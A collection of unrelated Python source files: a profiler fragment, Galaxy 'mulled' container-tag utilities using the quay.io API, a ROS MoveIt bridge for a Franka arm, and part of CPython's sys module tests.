self._lock = threading.Lock()
def enable(self, enable):
self._enable = enable
def record(self, name_with_tag):
if self._enable is False:
return
timestamp = int(round(_time() * 1000000))
name_with_tag = name_with_tag.split("_")
tag = name_with_tag[-1]
name = '_'.join(name_with_tag[:-1])
with self._lock:
self._time_record.put((name, tag, timestamp))
return timestamp
def print_profile(self):
if self._enable is False:
return
sys.stderr.write(self.gen_profile_str())
def gen_profile_str(self):
if self._enable is False:
return
print_str = self._print_head
tmp = {}
with self._lock:
while not self._time_record.empty():
name, tag, timestamp = self._time_record.get()
if name in tmp:
ptag, ptimestamp = tmp.pop(name)
print_str += "{}_{}:{} ".format(name, ptag, ptimestamp)
print_str += "{}_{}:{} ".format(name, tag, timestamp)
else:
tmp[name] = (tag, timestamp)
print_str = "\n{}\n".format(print_str)
for name, item in tmp.items():
tag, timestamp = item
self._time_record.put((name, tag, timestamp))
return print_str
|
util.py
|
"""Utilities for working with mulled abstractions outside the mulled package."""
from __future__ import print_function
import collections
import hashlib
import logging
import re
import sys
import tarfile
import threading
from io import BytesIO
import packaging.version
import requests
log = logging.getLogger(__name__)
QUAY_REPOSITORY_API_ENDPOINT = 'https://quay.io/api/v1/repository'
BUILD_NUMBER_REGEX = re.compile(r'\d+$')
PARSED_TAG = collections.namedtuple('ParsedTag', 'tag version build_string build_number')
def create_repository(namespace, repo_name, oauth_token):
assert oauth_token
headers = {'Authorization': 'Bearer %s' % oauth_token}
data = {
"repository": repo_name,
"namespace": namespace,
"description": "",
"visibility": "public",
}
requests.post("https://quay.io/api/v1/repository", json=data, headers=headers)
def quay_versions(namespace, pkg_name):
"""Get all version tags for a Docker image stored on quay.io for supplied package name."""
data = quay_repository(namespace, pkg_name)
if 'error_type' in data and data['error_type'] == "invalid_token":
return []
if 'tags' not in data:
raise Exception("Unexpected response from quay.io - no tags description found [%s]" % data)
return [tag for tag in data['tags'].keys() if tag != 'latest']
def quay_repository(namespace, pkg_name):
assert namespace is not None
assert pkg_name is not None
url = 'https://quay.io/api/v1/repository/%s/%s' % (namespace, pkg_name)
response = requests.get(url, timeout=None)
data = response.json()
return data
def _namespace_has_repo_name(namespace, repo_name, resolution_cache):
"""
Get all quay containers in the biocontainers repo
"""
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:namespace_repo_names"
if resolution_cache is not None and cache_key in resolution_cache:
repo_names = resolution_cache.get(cache_key)
else:
repos_parameters = {'public': 'true', 'namespace': namespace}
repos_headers = {'Accept-encoding': 'gzip', 'Accept': 'application/json'}
repos_response = requests.get(
QUAY_REPOSITORY_API_ENDPOINT, headers=repos_headers, params=repos_parameters, timeout=None)
repos = repos_response.json()['repositories']
repo_names = [r["name"] for r in repos]
if resolution_cache is not None:
resolution_cache[cache_key] = repo_names
return repo_name in repo_names
def mulled_tags_for(namespace, image, tag_prefix=None, resolution_cache=None):
"""Fetch remote tags available for supplied image name.
The result will be sorted so newest tags are first.
"""
if resolution_cache is not None:
# Following check is pretty expensive against biocontainers... don't even bother doing it
# if can't cache the response.
if not _namespace_has_repo_name(namespace, image, resolution_cache):
log.debug("skipping mulled_tags_for [%s] no repository" % image)
return []
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:tag_cache"
if resolution_cache is not None:
if cache_key not in resolution_cache:
resolution_cache[cache_key] = collections.defaultdict(dict)
tag_cache = resolution_cache.get(cache_key)
else:
tag_cache = collections.defaultdict(dict)
tags_cached = False
if namespace in tag_cache:
if image in tag_cache[namespace]:
tags = tag_cache[namespace][image]
tags_cached = True
if not tags_cached:
tags = quay_versions(namespace, image)
tag_cache[namespace][image] = tags
if tag_prefix is not None:
tags = [t for t in tags if t.startswith(tag_prefix)]
tags = version_sorted(tags)
return tags
def split_tag(tag):
"""Split mulled image tag into conda version and conda build."""
return tag.rsplit('--', 1)
def parse_tag(tag):
"""Decompose tag of mulled images into version, build string and build number."""
version = tag
build_string = "-1"
if '--' in tag:
version, build_string = tag.rsplit('--', 1)
elif '-' in tag:
# Should be mulled multi-container image tag
version, build_string = tag.rsplit('-', 1)
build_number = int(BUILD_NUMBER_REGEX.search(tag).group(0))
return PARSED_TAG(tag=tag,
version=packaging.version.parse(version),
build_string=packaging.version.parse(build_string),
build_number=build_number)
def version_sorted(elements):
"""Sort iterable based on loose description of "version" from newest to oldest."""
elements = (parse_tag(tag) for tag in elements)
elements = sorted(elements, key=lambda tag: tag.build_string, reverse=True)
elements = sorted(elements, key=lambda tag: tag.build_number, reverse=True)
elements = sorted(elements, key=lambda tag: tag.version)
return [e.tag for e in elements]
Target = collections.namedtuple("Target", ["package_name", "version", "build", "package"])
def build_target(package_name, version=None, build=None, tag=None):
"""Use supplied arguments to build a :class:`Target` object."""
if tag is not None:
assert version is None
assert build is None
version, build = split_tag(tag)
return Target(package_name, version, build, package_name)
def conda_build_target_str(target):
rval = target.package_name
if target.version:
rval += "=%s" % target.version
if target.build:
rval += "=%s" % target.build
return rval
def _simple_image_name(targets, image_build=None):
target = targets[0]
suffix = ""
if target.version is not None:
build = target.build
if build is None and image_build is not None and image_build != "0":
# Special case image_build == "0", which has been built without a suffix
print("WARNING: Hard-coding image build instead of using Conda build - this is not recommended.")
build = image_build
suffix += ":%s" % target.version
if build is not None:
suffix += "--%s" % build
return "%s%s" % (target.package_name, suffix)
def v1_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 1 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names and versions together as the repository name. For mulled
version 1 containers the image build is the repository tag (if supplied).
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v1_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v1_image_name(multi_targets)
'mulled-v1-b06ecbd9141f0dbbc0c287375fc0813adfcbdfbd'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v1_image_name(multi_targets_on_versionless)
'mulled-v1-bda945976caa5734347fbf7f35066d9f58519e0c'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v1_image_name(multi_targets_versionless)
'mulled-v1-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
requirements_buffer = "\n".join(map(conda_build_target_str, targets_order))
m = hashlib.sha1()
m.update(requirements_buffer.encode())
suffix = "" if not image_build else ":%s" % image_build
return "mulled-v1-%s%s" % (m.hexdigest(), suffix)
def v2_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 2 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names as the repository name and hash the package versions (if set)
as the tag.
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1'
>>> single_targets = [build_target("samtools", version="1.3.1", build="py_1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1--py_1'
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets, image_build="0")
'samtools:1.3.1'
>>> single_targets = [build_target("samtools", version="1.3.1", build="py_1")]
>>> v2_image_name(single_targets, image_build="0")
'samtools:1.3.1--py_1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v2_image_name(multi_targets)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:4d0535c94ef45be8459f429561f0894c3fe0ebcf'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v2_image_name(multi_targets_on_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:b0c847e4fb89c343b04036e33b2daa19c4152cf5'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v2_image_name(multi_targets_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
package_name_buffer = "\n".join(map(lambda t: t.package_name, targets_order))
package_hash = hashlib.sha1()
package_hash.update(package_name_buffer.encode())
versions = map(lambda t: t.version, targets_order)
if any(versions):
# Only hash versions if at least one package has versions...
version_name_buffer = "\n".join(map(lambda t: t.version or "null", targets_order))
version_hash = hashlib.sha1()
version_hash.update(version_name_buffer.encode())
version_hash_str = version_hash.hexdigest()
else:
version_hash_str = ""
if not image_build:
build_suffix = ""
elif version_hash_str:
# tagged verson is <version_hash>-<build>
build_suffix = "-%s" % image_build
else:
# tagged version is simply the build
build_suffix = image_build
suffix = ""
if version_hash_str or build_suffix:
suffix = ":%s%s" % (version_hash_str, build_suffix)
return "mulled-v2-%s%s" % (package_hash.hexdigest(), suffix)
def get_file_from_recipe_url(url):
"""Downloads file at url and returns tarball"""
r = requests.get(url)
return tarfile.open(mode="r:bz2", fileobj=BytesIO(r.content))
def split_container_name(name):
"""
Takes a container name (e.g. samtools:1.7--1) and returns a list (e.g. ['samtools', '1.7', '1'])
>>> split_container_name('samtools:1.7--1')
['samtools', '1.7', '1']
"""
return name.replace('--', ':').split(':')
class PrintProgress(object):
def __init__(self):
self.thread = threading.Thread(target=self.progress)
self.stop = threading.Event()
def progress(self):
while not self.stop.is_set():
print(".", end="")
sys.stdout.flush()
self.stop.wait(60)
print("")
def __enter__(self):
self.thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop.set()
self.thread.join()
image_name = v1_image_name # deprecated
__all__ = (
"build_target",
"conda_build_target_str",
"image_name",
"mulled_tags_for",
"quay_versions",
"split_container_name",
"split_tag",
"Target",
"v1_image_name",
"v2_image_name",
"version_sorted",
)
|
arm_interface_helper.py
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2013, SRI International
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of SRI International nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Acorn Pooley, Mike Lautman
"""This is a python2 heper script to use `moveit_commander`.
`moveit_commander` is not usable with python3. To prevent me from compiling a
catkin worspace with python3 and potentially breaking compatibility with other
components, I created this script that allows bridging the python3 script with
the python2 script."""
import json
import threading
import geometry_msgs.msg
import moveit_commander
import moveit_msgs.msg
import rospy
from bottle import post, request, run
class FrankaInterface(object):
"""Franka Interface."""
def __init__(self):
super(FrankaInterface, self).__init__()
moveit_commander.roscpp_initialize([""])
self.robot = moveit_commander.RobotCommander()
self.scene = moveit_commander.PlanningSceneInterface()
self.group_name = "panda_arm"
self.move_group = moveit_commander.MoveGroupCommander(self.group_name)
self.display_trajectory_publisher = rospy.Publisher(
"/move_group/display_planned_path", moveit_msgs.msg.DisplayTrajectory, queue_size=20
)
self.planning_frame = self.move_group.get_planning_frame()
self.eef_link = self.move_group.get_end_effector_link()
self.group_names = self.robot.get_group_names()
def move_joints(self, goal):
"""Move joint."""
joint_goal = self.move_group.get_current_joint_values()
joint_goal[:7] = goal
self.move_group.go(joint_goal, wait=True)
self.move_group.stop() # ensures that there is no residual movement
def move_ee(self, goal):
"""Move cartesian."""
pose_goal = geometry_msgs.msg.Pose()
pose_goal.position.x = goal[0]
pose_goal.position.y = goal[1]
pose_goal.position.z = goal[2]
pose_goal.orientation.x = goal[3]
pose_goal.orientation.y = goal[4]
pose_goal.orientation.z = goal[5]
pose_goal.orientation.w = goal[6]
self.move_group.set_pose_target(pose_goal)
self.move_group.go(wait=True)
self.move_group.stop() # ensures that there is no residual movement
self.move_group.clear_pose_targets()
def get_current_joint_values(self):
joint_values = self.move_group.get_current_joint_values()
return joint_values[:7]
def get_current_pose(self, end_effector_link="panda_link8"):
"""Get current pose"""
pose = self.move_group.get_current_pose(end_effector_link).pose
return (
(pose.position.x, pose.position.y, pose.position.z),
(pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w),
)
def get_current_rpy(self, end_effector_link="panda_link8"):
"""Get current rool, pitch, yaw."""
return self.move_group.get_current_rpy(end_effector_link)
def display_trajectory(self, plan):
"""Display trajectory."""
display_trajectory = moveit_msgs.msg.DisplayTrajectory()
display_trajectory.trajectory_start = self.robot.get_current_state()
display_trajectory.trajectory.append(plan)
self.display_trajectory_publisher.publish(display_trajectory)
@post("/process")
def my_process():
req_obj = json.loads(request.body.read())
req_type = req_obj["type"]
out = None
if req_type == "ready":
pass
elif req_type == "call":
func = getattr(fi, req_obj["func_name"])
if req_obj["wait_for_result"]:
out = func(*req_obj["args"], **req_obj["kwargs"])
return {"out": out}
else:
t = threading.Thread(target=func, args=req_obj["args"], kwargs=req_obj["kwargs"])
t.start()
else:
raise RuntimeError("unknown req_type %s" % req_type)
return {"out": None}
if __name__ == "__main__":
rospy.init_node("arm_interface_helper", anonymous=True, disable_signals=True)
fi = FrankaInterface()
run(host="localhost", port=8080, debug=True, quiet=True)
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
from test.support import import_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash13", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
elif algo == 3:
self.assertEqual(sys.hash_info.algorithm, "siphash13")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash13", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
